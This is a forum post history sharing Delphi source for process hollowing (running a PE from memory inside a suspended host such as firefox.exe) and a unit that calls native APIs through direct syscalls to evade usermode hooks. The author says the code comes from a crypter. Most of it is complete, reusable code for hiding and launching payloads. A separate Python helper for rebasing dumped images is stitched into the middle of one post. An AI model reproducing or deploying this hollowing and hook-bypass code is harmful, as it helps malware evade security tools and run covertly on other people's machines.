Show Posts



Messages - meong

1
Delphi/Pascal / Re: [Delphi] Execute PE From Memory, Native Syscall Way
« on: December 15, 2012, 11:43:31 AM »
cool blog bro, all about low level programming.. mind if I save the page :D

thanks bro.. :D

2
Delphi/Pascal / [Delphi] Execute PE From Memory, Native Syscall Way
« on: December 14, 2012, 11:49:59 AM »
Some time ago I posted a unit about how to call the native API directly via syscall, without going through ntdll: http://cybercoding.wordpress.com/2012/12/01/union-api/

Many friends asked how to use it.. Since I had some spare time, I made a unit that executes a PE file from memory.

Method for executing a file from memory:
- Run the target executable with the CREATE_SUSPENDED flag. (Windows loads the file into memory and sets up the process, then suspends it before executing the main code at the entry point.)

- Get the image base address (the memory address of the PE file in the process space).

- Allocate and write our PE into the target process's memory.

- Change the image base and entry point to the memory address in the target process (of our PE file).

- Resume the process (ResumeThread).

Simple, right? hehehe. This method is widely used by file crypters/binders out there. Its purpose is of course so that the original file is not analyzed directly (because it is encrypted). The technique itself is not new and has a fundamental weakness.. for example hooking the allocation and resume-thread functions :lol:

btw, the unit below only makes the execute-from-memory method harder to detect in usermode, because it calls the native API directly through syscall rather than through ntdll (doing the same thing that ntdll does).

Code:
{ Just another version of execute-file-from-memory; it uses the native API -> syscall
  path to bypass usermode hookers
  Website: Cybercoding.wordpress.com / http://ic0de.org
  Modified: abhe
  Thanks : steve10120
}
unit U_MemExecute;

interface
uses
windows, codesitelogging, U_UnionApi;

function ExecuteFromMem(szFilePath, szParams:String; pFile:Pointer; PatchPEB : Boolean):DWORD;
implementation


Type
  NTSTATUS = cardinal;
  PVOID = pointer;
  PPVOID = ^PVOID;

  PUnicodeString = ^TUnicodeString;
  TUnicodeString = packed record
    Length: Word;
    MaximumLength: Word;
    Buffer: PWideChar;
  end;

  PImageBaseRelocation = ^TImageBaseRelocation;
  TImageBaseRelocation = packed record
     VirtualAddress: DWORD;
     SizeOfBlock: DWORD;
  end;

procedure xdebug(int:integer);
begin
  codesite.Send('error',int);
end;

function NtSuccess (Stat: LongInt): Boolean;
begin
  Result := Stat >= 0;
end;

//VirtualAlloc the way old Windows source code does it: a thin wrapper over NtAllocateVirtualMemory
function ExVirtualAlloc(hProcess: THandle; lpAddress: Pointer;
  dwSize, flAllocationType: DWORD; flProtect: DWORD): Pointer; stdcall;
var
  Status: NTSTATUS;
begin
    status := ApiCall32('NtAllocateVirtualMemory', [
                hProcess,
                @lpAddress,
                0,
                @dwSize,
                flAllocationType,
                flProtect
              ]);

    if NtSuccess(Status) then result := lpAddress
    else result := nil;
end;

function ExWriteProcessMemory(hProcess: THandle; const lpBaseAddress: Pointer; lpBuffer: Pointer;
  nSize: DWORD; var lpNumberOfBytesWritten: DWORD): BOOL; stdcall;
var
  RegionSize: Cardinal;
  Base: Pointer;
  OldProtect: ULONG;
  Status: NTSTATUS;
begin
    result := false;
    RegionSize := nSize;
    Base := lpBaseAddress;

    Status := ApiCall32('NtProtectVirtualMemory', [
                hProcess,
                @Base,
                @RegionSize,
                PAGE_EXECUTE_READWRITE,
                @OldProtect
              ]);

    if NtSuccess(Status) then begin

      if ((OldProtect and PAGE_READWRITE) = PAGE_READWRITE) or
         ((OldProtect and PAGE_WRITECOPY) = PAGE_WRITECOPY) or
         ((OldProtect and PAGE_EXECUTE_READWRITE) = PAGE_EXECUTE_READWRITE) or
         ((OldProtect and PAGE_EXECUTE_WRITECOPY) = PAGE_EXECUTE_WRITECOPY) then begin

        ApiCall32('NtProtectVirtualMemory', [
          hProcess,
          @Base,
          @RegionSize,
          OldProtect,
          @OldProtect
        ]);

        Status := ApiCall32('NtWriteVirtualMemory', [
                    hProcess,
                    lpBaseAddress,
                    lpBuffer,
                    nSize,
                    @lpNumberOfBytesWritten
                  ]);

        if NtSuccess(Status) then begin
          result := true;
          ApiCall32('NtFlushInstructionCache', [hProcess,lpBaseAddress,nSize]);
        end;
      end else begin

        if ((OldProtect and PAGE_NOACCESS) = PAGE_NOACCESS) or
           ((OldProtect and PAGE_READONLY) = PAGE_READONLY) then begin

          ApiCall32('NtProtectVirtualMemory', [
            hProcess,
            @Base,
            @RegionSize,
            OldProtect,
            @OldProtect
          ]);
        end else begin

          Status := ApiCall32('NtWriteVirtualMemory', [
                      hProcess,
                      lpBaseAddress,
                      lpBuffer,
                      nSize,
                      @lpNumberOfBytesWritten
                    ]);

          ApiCall32('NtProtectVirtualMemory', [
            hProcess,
            @Base,
            @RegionSize,
            OldProtect,
            @OldProtect
          ]);

          if NtSuccess(Status) then begin
            result := true;
            ApiCall32('NtFlushInstructionCache', [hProcess,lpBaseAddress,nSize]);
          end;
        end;
      end;
    end;
end;

//patch the image path in the PEB's loader entry so that GetModuleFileName calls
//inside the target report the real file location
Procedure PatchImagePathRemote(PH:Thandle; Peb:Dword; szNewImageBaseName: PWidechar);
Label
  Top, Retry;
var
  no_success  : integer;
  ldr_data    : Dword;
  Current     : DWord;
  BytesRead   : DWord;
  unicode     : TUnicodeString;
  pNewAddr    : Pointer;
begin
  no_success := 0;
Retry:
  //PEB.Ldr is filled in by ntdll only after the thread has been resumed, so poll
  //(50 ms apart, at most 600 times = about 30 s) until the loader data is populated
  if (no_success >= 600) then exit
  else begin
    inc(no_success);
    Sleep(50);
    goto Top;
  end;
Top :
    xdebug(400);
    //NtReadVirtualMemory
    if (not NtSuccess(ApiCall32('NtReadVirtualMemory',
      [ PH, Ptr(Peb+$c), @ldr_data, sizeof(ldr_data), @BytesRead]))) or
      (ldr_data = 0)  then goto Retry;


    xdebug(401);
    //NtReadVirtualMemory
    if (not NtSuccess(ApiCall32('NtReadVirtualMemory',
      [ PH, Ptr(ldr_data+$c), @Current, sizeof(Current), @BytesRead]))) or
      (Current = 0)  then goto Retry;

    xdebug(402);
    //NtReadVirtualMemory
    if (not NtSuccess(ApiCall32('NtReadVirtualMemory',
      [ PH, Ptr(Current+$24), @unicode, sizeof(unicode), @BytesRead])))  then exit;

    unicode.Length := lstrlenW(szNewImageBaseName) * 2;   //byte length, without terminator
    unicode.MaximumLength := unicode.Length+2;            //room for the terminating null

    xdebug(403);
    //allocate MaximumLength so the terminator fits as well
    //($1000 or $2000 = MEM_COMMIT or MEM_RESERVE, $40 = PAGE_EXECUTE_READWRITE)
    pNewAddr := ExVirtualAlloc(PH, nil, unicode.MaximumLength, $1000 or $2000, $40);

    xdebug(404);
    if (pNewAddr<>nil) then begin
      xdebug(405);
      unicode.Buffer := pNewAddr;
      //copy the string including its null, then overwrite the UNICODE_STRING at
      //entry+$24 (FullDllName of the first in-load-order LDR_DATA_TABLE_ENTRY)
      ExWriteProcessMemory(PH, pNewAddr, szNewImageBaseName, unicode.MaximumLength, BytesRead);
      ExWriteProcessMemory(PH, Ptr(Current+$24), @unicode, sizeof(unicode), BytesRead);
    end;
end;

function Get4ByteAlignedContext(var Base: Pointer): PContext;
begin
    Base := ExVirtualAlloc(Thandle(-1), nil, SizeOf(TContext) + 4, MEM_COMMIT, PAGE_READWRITE);
    Result := Base;
    if Base <> nil then
      while ((DWORD(Result) mod 4) <> 0) do
        Result := Pointer(DWORD(Result) + 1);
end;

//apply the .reloc table to a section-aligned image: every HIGHLOW entry gets
//f_delta (new base - preferred base) added, mirroring what the Windows loader does
procedure PerformBaseRelocation(f_module: Pointer; INH:PImageNtHeaders; f_delta: Cardinal); stdcall;
var
  l_i, l_count: Integer;
  l_codebase: Pointer;
  l_relocation: PImageBaseRelocation;
  l_dest: Pointer;
  l_relInfo: ^Word;
  l_patchAddrHL: ^longword;
  l_type, l_offset: integer;
begin
  l_codebase := f_module;
  //DataDirectory[5] is IMAGE_DIRECTORY_ENTRY_BASERELOC
  if INH^.OptionalHeader.DataDirectory[5].Size > 0 then
  begin
    l_relocation := PImageBaseRelocation(Cardinal(l_codebase) + INH^.OptionalHeader.DataDirectory[5].VirtualAddress);
    //a block with VirtualAddress 0 terminates the table
    while l_relocation.VirtualAddress > 0 do
    begin
      l_dest := Pointer((Cardinal(l_codebase) + l_relocation.VirtualAddress));
      //16-bit entries follow the 8-byte block header: type in the high 4 bits,
      //offset within the page in the low 12 bits
      l_relInfo := Pointer(Cardinal(l_relocation) + 8);
      l_count := (l_relocation.SizeOfBlock - 8) div 2;   //Integer, so an empty block gives 0 iterations
      for l_i := 0 to l_count - 1 do
      begin
        l_type := (l_relInfo^ shr 12);
        l_offset := l_relInfo^ and $FFF;
        if l_type = 3 then   //IMAGE_REL_BASED_HIGHLOW: 32-bit absolute address
        begin
          l_patchAddrHL := Pointer(Cardinal(l_dest) + Cardinal(l_offset));
          l_patchAddrHL^ := l_patchAddrHL^ + f_delta;
        end;
        inc(l_relInfo);
      end;
      l_relocation := Pointer(cardinal(l_relocation) + l_relocation.SizeOfBlock);
    end;
  end;
end;

function AlignImage(pImage:Pointer):Pointer;
var
  IDH:          PImageDosHeader;
  INH:          PImageNtHeaders;
  ISH:          PImageSectionHeader;
  i:            WORD;
begin
    IDH := pImage;
    INH := Pointer(Integer(pImage) + IDH^._lfanew);
    GetMem(Result, INH^.OptionalHeader.SizeOfImage);
    ZeroMemory(Result, INH^.OptionalHeader.SizeOfImage);
    CopyMemory(Result, pImage, INH^.OptionalHeader.SizeOfHeaders);
    for i := 0 to INH^.FileHeader.NumberOfSections - 1 do begin
      ISH := Pointer(Integer(pImage) + IDH^._lfanew + 248 + i * 40);
      CopyMemory(Pointer(DWORD(Result) + ISH^.VirtualAddress), Pointer(DWORD(pImage) + ISH^.PointerToRawData), ISH^.SizeOfRawData);
    end;
end;

//execute pe file from memory
function ExecuteFromMem(szFilePath, szParams:String; pFile:Pointer; PatchPEB : Boolean):DWORD;
var
  IDH:      PImageDosHeader;
  INH:      PImageNtHeaders;
  PI:       TProcessInformation;
  SI:       TStartupInfo;
  CT:       PContext;
  CTBase,
  pModule:  Pointer;
  dwIBase,
  dwread:   DWORD;
  Wow1, wow2:     Cardinal;
begin
    Result := 0;

    {Check Image}
    if pFile=nil then exit;
    IDH := pFile;
    if (IDH^.e_magic <> IMAGE_DOS_SIGNATURE) then exit;
    INH := Pointer(Integer(pFile) + IDH^._lfanew);
    if (INH^.Signature <> IMAGE_NT_SIGNATURE) then exit;

    ZeroMemory(@SI, Sizeof(TStartupInfo));
    ZeroMemory(@PI, Sizeof(TProcessInformation));
    SI.cb := Sizeof(TStartupInfo);

    xdebug(200);
    if CreateProcess(PChar(szFilePath), PChar(szParams), nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, SI, PI) then begin

      {check for 64-bit: if the target is a 64-bit application we don't inject into it.. we inject into our own file instead}
      Wow1 := IsWow;
      wow2 := 0;

      //NtQueryInformationProcess -> ProcessWow64Information
      ApiCall32('NtQueryInformationProcess', [PI.hProcess, 26, @wow2, Sizeof(wow2), nil]);

      if (Wow1 <> 0) and (wow2=0) then begin
        {target is 64bit, use self injection}

        //NtTerminateProcess
        ApiCall32('NtTerminateProcess', [PI.hProcess, 0]);

        xDebug(207);
        ExecuteFromMem(paramstr(0), szParams, pFile, patchpeb);

        exit;
      end;


      xdebug(201);
      CT := Get4ByteAlignedContext(CTBase);
      if (CT <> nil) then begin

        xdebug(202);
        CT.ContextFlags := CONTEXT_FULL;

        //NtGetContextThread
        if NtSuccess(ApiCall32('NtGetContextThread', [PI.hThread, CT])) then begin

          xdebug(203);
          dwread := 0;
          dwIBase := 0;   //stays 0 if the read below fails

          //NtReadVirtualMemory: in a freshly created suspended process EBX holds the
          //PEB address and PEB+8 is ImageBaseAddress
          ApiCall32('NtReadVirtualMemory',
            [PI.hProcess, Pointer(CT.Ebx + 8), @dwIBase, SizeOf(dwIBase), @dwread]);

          dwread :=  INH^.OptionalHeader.SizeOfImage;

          if (dwIBase = INH^.OptionalHeader.ImageBase) then begin
            //NtUnmapViewOfSection
            if ApiCall32('NtUnmapViewOfSection', [PI.hProcess, Pointer(INH^.OptionalHeader.ImageBase)])=0 then
              pModule := ExVirtualAlloc(PI.hProcess, Pointer(INH^.OptionalHeader.ImageBase), INH^.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
            else
              pModule := ExVirtualAlloc(PI.hProcess, nil, INH^.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
          end else
            pModule := ExVirtualAlloc(PI.hProcess, Pointer(INH^.OptionalHeader.ImageBase), INH^.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);

          if (pModule <> nil) then begin

            xdebug(204);
            pFile := AlignImage(pFile);
            if (DWORD(pModule) <> INH^.OptionalHeader.ImageBase) then begin
              PerformBaseRelocation(pFile, INH, (DWORD(pModule) - INH^.OptionalHeader.ImageBase));
              INH^.OptionalHeader.ImageBase := DWORD(pModule);
              CopyMemory(Pointer(Integer(pFile) + IDH^._lfanew), INH, 248);
            end;

            ExWriteProcessMemory(PI.hProcess, pModule, pFile, INH.OptionalHeader.SizeOfImage, dwread);
            ExWriteProcessMemory(PI.hProcess, Pointer(CT.Ebx + 8), @pModule, 4, dwread);

            CT.Eax := DWORD(pModule) + INH^.OptionalHeader.AddressOfEntryPoint;

            //NtSetContextThread
            ApiCall32('NtSetContextThread', [PI.hThread, CT]);

            //NtResumeThread
            ApiCall32('NtResumeThread', [PI.hThread, nil]);

            result := PI.hThread;

            if PatchPEB and (lstrcmp(PChar(Paramstr(0)), PChar(szFilePath))<>0) then begin
              xdebug(205);
              PatchImagePathRemote( PI.hProcess, CT.Ebx, PWideChar(Paramstr(0)));
            end;

            if (pFile <> nil) then FreeMemory(pFile);
            xdebug(206);
          end;
        end;

        //NtFreeVirtualMemory
        dwread := 0;
        ApiCall32('NtFreeVirtualMemory',[Thandle(-1), @CTBase, @dwread, MEM_RELEASE]);
      end;

      if (Result = 0) then begin
        //NtTerminateProcess
        ApiCall32('NtTerminateProcess', [PI.hProcess, 0]);
      end;

    end;
end;

end.


and an example of use:

Code:
function LoadFile2String(const FileName: TFileName): AnsiString;
begin
  result := '';
  if not fileexists(FileName) then exit;
  with TFileStream.Create(FileName,fmOpenRead or fmShareDenyWrite) do  // Reading our File To STREAM
  begin
    try
      SetLength(Result, Size);
      Read(Pointer(Result)^, Size);
    except
      Result := '';  // Deallocates memory
      Free;
      raise;
    end;
    Free;
  end;
end;

var
Data:ansiString;
begin
    Data := LoadFile2String('MemExecute - Copy.exe');
    ExecuteFromMem('C:\Program Files (x86)\Mozilla Firefox\firefox.exe', '', @data[1], true);

link to my blog http://cybercoding.wordpress.com/2012/12/14/execute-pe-frommemory-syscall-way/
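Added example (Python, not part of the post or the author's unit): the same relocation walk that PerformBaseRelocation does, written as a parser for IMAGE_BASE_RELOCATION blocks, run on a constructed three-page image, and then used in reverse to move a dumped image back to its preferred ImageBase, which is what an analyst needs after dumping the image out of a hollowed process. The image layout, RVAs and base addresses are constructed for the example.

```python
import struct

IMAGE_REL_BASED_ABSOLUTE = 0  # padding entry; a loader must skip it
IMAGE_REL_BASED_HIGHLOW = 3   # 32-bit absolute address; the only type the Delphi unit patches


def parse_reloc_blocks(reloc: bytes):
    """Yield (page_rva, [(type, offset), ...]) per IMAGE_BASE_RELOCATION block.

    Each block is an 8-byte header (VirtualAddress, SizeOfBlock) followed by
    16-bit entries: high 4 bits = type, low 12 bits = offset within the page.
    A zero VirtualAddress terminates the table, as in the Delphi while-loop.
    """
    pos = 0
    while pos + 8 <= len(reloc):
        page_rva, size = struct.unpack_from("<II", reloc, pos)
        if page_rva == 0 or size < 8 or pos + size > len(reloc):
            break
        count = (size - 8) // 2
        words = struct.iter_unpack("<H", reloc[pos + 8:pos + 8 + 2 * count])
        yield page_rva, [(w >> 12, w & 0xFFF) for (w,) in words]
        pos += size


def apply_relocations(image: bytearray, reloc_rva: int, reloc_size: int, delta: int) -> int:
    """Add `delta` (new base - old base) to every HIGHLOW target of a flat,
    section-aligned image (what AlignImage() builds or a memory dump yields).
    Returns the number of fix-ups applied; rejects out-of-image targets."""
    reloc = bytes(image[reloc_rva:reloc_rva + reloc_size])
    applied = 0
    for page_rva, entries in parse_reloc_blocks(reloc):
        for rtype, offset in entries:
            if rtype == IMAGE_REL_BASED_ABSOLUTE:
                continue
            if rtype != IMAGE_REL_BASED_HIGHLOW:
                raise ValueError(f"unsupported relocation type {rtype}")
            at = page_rva + offset
            if at + 4 > len(image):
                raise ValueError(f"relocation target RVA {at:#x} outside image")
            value, = struct.unpack_from("<I", image, at)
            struct.pack_into("<I", image, at, (value + delta) & 0xFFFFFFFF)
            applied += 1
    return applied


def rebase_dump(image: bytearray, reloc_rva: int, reloc_size: int,
                dumped_base: int, preferred_base: int) -> int:
    """Undo the loader's relocation: move a dumped image back to its preferred base."""
    return apply_relocations(image, reloc_rva, reloc_size, preferred_base - dumped_base)


def build_sample_image():
    """Constructed image: code page at RVA 0x1000 holding three absolute pointers
    (preferred base 0x400000) and a .reloc block at RVA 0x2000 covering them."""
    image = bytearray(0x3000)
    struct.pack_into("<III", image, 0x1010, 0x00401000, 0x00401080, 0x00402000)
    entries = [(IMAGE_REL_BASED_HIGHLOW, 0x10), (IMAGE_REL_BASED_HIGHLOW, 0x14),
               (IMAGE_REL_BASED_HIGHLOW, 0x18), (IMAGE_REL_BASED_ABSOLUTE, 0)]  # last = pad
    block = struct.pack("<II", 0x1000, 8 + 2 * len(entries))
    block += b"".join(struct.pack("<H", (t << 12) | o) for t, o in entries)
    block += struct.pack("<II", 0, 0)  # terminating zero header
    image[0x2000:0x2000 + len(block)] = block
    return image, 0x2000, len(block)


def demo():
    """Relocate the sample to 0x10000000 as a loader would, then rebase it back."""
    image, rva, size = build_sample_image()
    applied = apply_relocations(image, rva, size, 0x10000000 - 0x400000)
    relocated = struct.unpack_from("<III", image, 0x1010)
    rebase_dump(image, rva, size, 0x10000000, 0x400000)
    restored = struct.unpack_from("<III", image, 0x1010)
    return applied, relocated, restored


if __name__ == "__main__":
    n, relocated, restored = demo()
    print(n, [hex(v) for v in relocated], [hex(v) for v in restored])
```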

3
Delphi/Pascal / Re: [Delphi] Get MD5 Loaded Module
« on: December 11, 2012, 03:31:19 PM »
which Delphi compiler does this use?

I use the Delphi XE compiler.. but it works with Delphi 7 too ;)

4
Programming / Union Api - Call Native Api using syscall
« on: December 01, 2012, 08:33:37 PM »
Hey guys, long time no check on this forum.. I'm not coding a security application now.. so I'm thinking of sharing some old code..

This unit was used in my old crypter, called MegaCrypter. The main idea is to use syscall to call the native API, so it is hard or impossible to hook in userland.

some references:
http://www.nynaeve.net/?p=48
http://blog.oxff.net/#2sapnfkthvpzjscp3xwq
or just search Google with keywords like syscall, sysenter, etc.

btw here you go, my unit

Code:
{ U_UnionApi
  Author: Abhe
  Description: Anti Hook NTDLL API
  Release Date: 1 December 2011
  Website: http://cybercoding.wordpress.com/
  History: Thanks, method from GameDeception, don't remember who.. :D
}


unit U_UnionApi;

interface
uses
Windows;

var
  pSystemCall: Pointer;
  WOW32Reserved: Cardinal;
  Ntdll: Pointer;
  SysNumber : DWORD;

function strlenA(const s: PAnsiChar): cardinal;
function LazyLoadPe(szFilename:PWideChar):Pointer;
Function GetSysNumber(ApiHash : DWORD):Word;overload;
Function GetSysNumber(ApiName : AnsiString):Word; overload;
function ExGetmoduleHandle(mhash: Cardinal): THANDLE;
function ExGetmoduleFileName(mhash: Cardinal): PWideChar;
function IsWow: NativeUint; stdcall;   //exported: U_MemExecute calls it to detect a WOW64 host

function ApiStub: DWORD; stdcall;

{32}
function ApiCall32(Number : DWORD; Arg1: Pointer): DWORD; stdcall; overload;
function ApiCall32(Number : DWORD; Arg1, Arg2: Pointer): DWORD; stdcall; overload;
function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3: Pointer): DWORD; stdcall; overload;
function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4: Pointer): DWORD; stdcall; overload;
function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4, Arg5: Pointer): DWORD; stdcall; overload;
function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4, arg5, Arg6: Pointer): DWORD; stdcall; overload;
function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4, arg5, Arg6, Arg7: Pointer): DWORD; stdcall; overload;
function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4, arg5, Arg6, Arg7, Arg8: Pointer): DWORD; stdcall; overload;
function ApiCall32(Number : DWORD; Arg: Array of Const): DWORD; stdcall; overload;
function ApiCall32(ApiName: AnsiString; Arg: Array of Const): DWORD; stdcall; overload;
implementation

function strlenA(const s: PAnsiChar): cardinal;
asm
  mov edx, edi
  mov edi, eax
  or ecx, -1
  xor eax, eax
  repne scasb
  dec eax
  dec eax
  sub eax, ecx
  mov edi, edx
end;

function adler32(adler: cardinal; buf: pointer; len: cardinal): cardinal;
asm
    push      ebx
    push      esi
    push      edi
    mov       edi,eax
    shr       edi,16
    movzx     ebx,ax
    push      ebp
    mov       esi,edx
    test      esi,esi
    mov       ebp,ecx
    jne       @31
    mov       eax,1
    jmp       @32
@31:
    test      ebp,ebp
    jbe       @34
@33:
    cmp       ebp,5552
    jae        @35
    mov       eax,ebp
    jmp        @36
@35:
    mov       eax,5552
@36:
    sub       ebp,eax
    cmp       eax,16
    jl        @38
    xor       edx,edx
    xor       ecx,ecx
@39:
    sub       eax,16
    mov       dl,[esi]
    mov       cl,[esi+1]
    add       ebx,edx
    add       edi,ebx
    add       ebx,ecx
    mov       dl,[esi+2]
    add       edi,ebx
    add       ebx,edx
    mov       cl,[esi+3]
    add       edi,ebx
    add       ebx,ecx
    mov       dl,[esi+4]
    add       edi,ebx
    add       ebx,edx
    mov       cl,[esi+5]
    add       edi,ebx
    add       ebx,ecx
    mov       dl,[esi+6]
    add       edi,ebx
    add       ebx,edx
    mov       cl,[esi+7]
    add       edi,ebx
    add       ebx,ecx
    mov       dl,[esi+8]
    add       edi,ebx
    add       ebx,edx
    mov       cl,[esi+9]
    add       edi,ebx
    add       ebx,ecx
    mov       dl,[esi+10]
    add       edi,ebx
    add       ebx,edx
    mov       cl,[esi+11]
    add       edi,ebx
    add       ebx,ecx
    mov       dl,[esi+12]
    add       edi,ebx
    add       ebx,edx
    mov       cl,[esi+13]
    add       edi,ebx
    add       ebx,ecx
    mov       dl,[esi+14]
    add       edi,ebx
    add       ebx,edx
    mov       cl,[esi+15]
    add       edi,ebx
    add       ebx,ecx
    cmp       eax,16
    lea       esi,[esi+16]
    lea       edi,[edi+ebx]
    jge       @39
@38:
    test      eax,eax
    je         @42
@43:
    xor       edx,edx
    mov       dl,[esi]
    add       ebx,edx
    dec       eax
    lea       esi,[esi+1]
  lea       edi,[edi+ebx]
    jg        @43
@42:
    mov       ecx,65521
    mov       eax,ebx
    xor       edx,edx
    div       ecx
    mov       ebx,edx
    mov       ecx,65521
    mov       eax,edi
    xor       edx,edx
    div       ecx
    test      ebp,ebp
    mov       edi,edx
    ja        @33
@34:
    mov       eax,edi
    shl       eax,16
    or        eax,ebx
@45:
@32:
    pop       ebp
    pop       edi
    pop       esi
    pop       ebx
end;

function LazyLoadPe(szFilename:PWideChar):Pointer;
var
  hFile:    DWORD;
  dwSize:   DWORD;
  dwNull:   DWORD;
  temp:     Pointer;
  IDH:      PImageDosHeader;
  INH:      PImageNtHeaders;
  ISH:      PImageSectionHeader;
  i:        WORD;
begin
  result := nil;
  hFile := CreateFileW(szFilename, GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);
  if (hFile = INVALID_HANDLE_VALUE) then exit;
  dwSize := GetFileSize(hFile, nil);
  GetMem(temp, dwSize);
  if not ReadFile(hFile, temp^, dwSize, dwNull, nil) then begin
    //don't leak the buffer and the handle on a failed read
    FreeMem(temp, dwSize);
    CloseHandle(hFile);
    exit;
  end;
  IDH := temp;
  INH := Pointer(Integer(temp) + IDH^._lfanew);
  GetMem(Result, INH^.OptionalHeader.SizeOfImage);
  ZeroMemory(Result, INH^.OptionalHeader.SizeOfImage);
  CopyMemory(Result, temp, INH^.OptionalHeader.SizeOfHeaders);
  for i := 0 to INH^.FileHeader.NumberOfSections - 1 do begin
    ISH := Pointer(Integer(temp) + IDH^._lfanew + 248 + i * 40);
    CopyMemory(Pointer(DWORD(Result) + ISH^.VirtualAddress), Pointer(DWORD(temp) + ISH^.PointerToRawData), ISH^.SizeOfRawData);
  end;
  FreeMem(temp, dwSize);
  CloseHandle(hFile);
end;

function GetPEB(): Pointer;
asm
  mov eax, large fs:30h
  retn
end;

function ExGetmoduleHandle(mhash: Cardinal): THANDLE;
var
  x , f, cur  : DWORD;
  Hash        : Cardinal;
begin
  result := 0;
  x := DWORD(GetPEB);
  if (mhash = 0) then begin
    result := PDWORD(x+8)^;
    exit;
  end;
  x := PDWORD(x+$C)^;
  f := x+$14;
  cur := PDWORD(f)^;
  while (cur <> f) do begin
    x := cur - $8;
    Hash := adler32(0, Pointer(PDWORD(x+$30)^), PWORD(x+$2c)^);
    if (hash=mhash) then begin
      result := PDWORD(x+$18)^;
      exit;
    end;
    cur := PDWORD(cur)^;
  end;
end;

function ExGetmoduleFileName(mhash: Cardinal): PWideChar;
var
  x , f, cur  : DWORD;
  Hash        : Cardinal;
begin
  result := nil;
  x := DWORD(GetPEB);
  x := PDWORD(x+$C)^;
  f := x+$14;
  cur := PDWORD(f)^;
  while (cur <> f) do begin
    x := cur - $8;
    Hash := adler32(0, Pointer(PDWORD(x+$30)^), PWORD(x+$2c)^);
    if (hash=mhash) then begin
      result := PWidechar(Pointer(PDWORD(x+$28)^));
      exit;
    end;
    cur := PDWORD(cur)^;
  end;
end;

function ExGetProcAddress(hModule: THANDLE; phash: Cardinal): Pointer;
var
  pINH: PImageNtHeaders;
  pIDD: PImageDataDirectory;
  pIED: PImageExportDirectory;
  pdwFuncs1, pdwFuncs: PULONG;
  pdwNames: PULONG;
  pdwOrdinals: PWORD;
  dwOrd1: DWORD;
  i, k: cardinal;
  apiname:PAnsiChar;
  hash :Cardinal;
begin
  result := nil;
  pINH := PImageNtHeaders(Cardinal(hModule) + Cardinal(PImageDosHeader(hModule)^._lfanew));
  //index the directory array properly; the original added the entry index to the byte
  //address, which only worked because IMAGE_DIRECTORY_ENTRY_EXPORT is 0
  pIDD := @pINH^.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
  pIED := PImageExportDirectory(ULONG(hModule) + pIDD^.VirtualAddress);
  pdwFuncs := PULONG(ULONG(hModule) + Cardinal(pIED^.AddressOfFunctions));
  pdwNames := PULONG(ULONG(hModule) + Cardinal(pIED^.AddressOfNames));
  pdwOrdinals := PWORD(ULONG(hModule) + Cardinal(pIED^.AddressOfNameOrdinals));
  pdwFuncs1 := pdwFuncs;
  for i := 0 to pIED^.NumberOfNames - 1 do begin
    dwOrd1 := pdwOrdinals^;
    k := 0;
    pdwFuncs := pdwFuncs1;
    while (k < dwOrd1) do begin
      inc(pdwFuncs);
      inc(k);
    end;
    if (pdwFuncs^ < pIDD^.VirtualAddress) or (pdwFuncs^ >= pIDD^.VirtualAddress + pIDD^.Size) then begin
      apiname := PAnsiChar(hModule + pdwNames^);
      hash := adler32(0, apiname, strlenA(apiname));
      if (hash = phash) then begin
        result := Pointer(ULONG(hModule) + pdwFuncs^);
        exit;
      end;
    end;
    inc(pdwOrdinals);
    inc(pdwNames);
  end;
end;

Function GetSysNumber(ApiHash : DWORD):Word;
var
  Addr : Pointer;
begin
  result := 0;
  Addr := ExGetProcAddress(Cardinal(Ntdll), ApiHash);
  //every 32-bit ntdll Nt* stub starts with "mov eax, <number>" (B8 imm32), so the
  //syscall number is the word right after the opcode byte; nil means unknown export
  if Addr <> nil then
    result := PWord(NativeUint(Addr)+1)^;
end;

Function GetSysNumber(ApiName : AnsiString):Word;
var
  Hash : Cardinal;
begin
  hash := adler32(0, Pansichar(apiname), Length(apiname));
  result := GetSysNumber(hash);
end;

//
// Manual System Call Api
//
function IsWow:NativeUint; stdcall;
asm
  xor   eax, eax
  mov   eax, fs:[eax+$18] //teb
  mov   eax, [eax+$C0] //WOW32Reserved
end;

function bSysenterAvailable: Bool;
asm
  XOR EAX, EAX
  CPUID
  BT EDX, 11
  db $D6 //SALC
end;

procedure INT2;
asm
  LEA EDX, [ESP+8]
  INT $2E
end;

procedure SYSENTER;
asm
  MOV EDX, ESP
  SYSENTER
end;

procedure WowCall;
asm
  xor ecx,ecx
  lea edx,[esp+4]
  call dword ptr fs:[$0C0]
end;

Procedure InitSysCall;
begin
  WOW32Reserved := IsWow;
  {check if sysenter availabe, use int2 if not}
  if not bSysenterAvailable then pSystemCall := @INT2
  else pSystemCall := @SYSENTER;
  if Boolean(WOW32Reserved) then pSystemCall := @WowCall;
end;

function ApiStub: DWORD; stdcall;
asm
  POP EBP
  mov edi, dword ptr [esp]
  mov dword ptr [esp+4], edi
  add esp, 4
  push eax
  call IsWow;
  mov edi, eax
  pop eax
  dec edi
  jns @F1
  xor EDI, EDI
  call pSystemCall
  jmp @f2
@F1:
  xor EDI, EDI
  jmp pSystemCall
@F2:
  //PUSH EBP
end;

function ApiCall32(Number : DWORD; Arg1: Pointer): DWORD; stdcall;
asm
  jmp ApiStub;
end;

function ApiCall32(Number : DWORD; Arg1, Arg2: Pointer): DWORD; stdcall;
asm
  jmp ApiStub;
end;

function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3: Pointer): DWORD; stdcall;
asm
  jmp ApiStub;
end;

function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4: Pointer): DWORD; stdcall;
asm
  jmp ApiStub;
end;

function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4, Arg5: Pointer): DWORD; stdcall;
asm
  jmp ApiStub;
end;

